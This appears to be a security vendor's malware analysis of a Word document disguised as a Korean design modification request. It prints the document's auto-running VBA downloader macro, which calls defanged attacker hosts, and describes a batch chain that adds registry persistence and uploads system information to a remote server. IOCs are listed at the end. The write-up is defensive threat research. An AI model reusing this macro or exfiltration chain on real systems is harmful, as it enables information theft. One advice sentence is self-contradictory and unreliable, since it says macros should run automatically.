Word File Disguised as a Design Modification Request for Information Theft

The ASEC analysis team has discovered the distribution of malicious Word file targeting Korean users. The filename is Design Modification Request.doc, and it includes an image that prompts the user to run the macro.

Figure 1. Image in the Word file

Figure 2. File information of Design Modification Request.doc

As shown below, the Word file includes a malicious macro that downloads additional files from hxxp://filedownloaders.com/doc09. When the user clicks Enable Content, the macro is automatically run, and it downloads additional malicious files.

Sub Document_Open()
    Dim RetVal As Long
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)
    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")

It then runs the downloaded temp.doc document file. The Word file contains texts to disguise as a Korean company.

Figure 3. Text within temp.doc

Figure 4. Information of temp.doc file
Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

no1.bat that was run via the Word file runs vvire.bat. If vvire.bat does not exist, it decompresses the setup.cab file that was downloaded from hxxp://filedownloaders.com/doc09/vbs6.txt, then runs vvire.bat.

Figure 3. Inside no1.bat file

vvire.bat performs the feature of adding to registry, running the no4.bat file, and downloading additional files.

Figure 4. Inside vvire.bat

It adds the Start.vbs file to registry so that the vvire.bat file is run automatically, and after running no4.bat, it deletes no1.bat. It then checks to see if a certain file exists and downloads additional files from hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt and runs them. This file cannot be checked as it is currently unavailable for download.

The figure below is Start.vbs file.

Figure 5. Inside star.vbs

no4.bat that was run via vvire.bat performs the feature of collecting information of the user PC below and leaking it to hxxp://senteroman.com/upl11/upload.php.

  • C:\Users\%username%\downloads\ list
  • C:\Users\%username%\documents\ list
  • C:\Users\%username%\desktop\ list
  • C:\Program Files\ list
  • IP information
  • tasklist
  • systeminfo

Upon running no4.bat, files with collected information are created in the C:\Users\Public\Documents\ folder, and when the collected information is uploaded, it creates the upok.txt file.

Figure 6. List of created files

As malicious document files that impersonate normal users to prompt users to enable macro such as this malware are consistently being distributed, users must stay vigilant. Also, users should change settings so that the macro inside the document will run automatically, and refrain from opening suspicious documents.

[V3 Detection]

  • Downloader/DOC.Generic

[Relevant IOC Info]

  • d6358ce7399df51138f89c74f408c5a9
  • dc7fda2a036016cca23f2867e644682c
  • d2732f2c6f8531e812053e6252c421cf
  • 66384f5091583b0c389918d5c8522cd6
  • hxxp://senteroman.com/upl11/upload.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:

5 1 vote
Article Rating
Inline Feedbacks
View all comments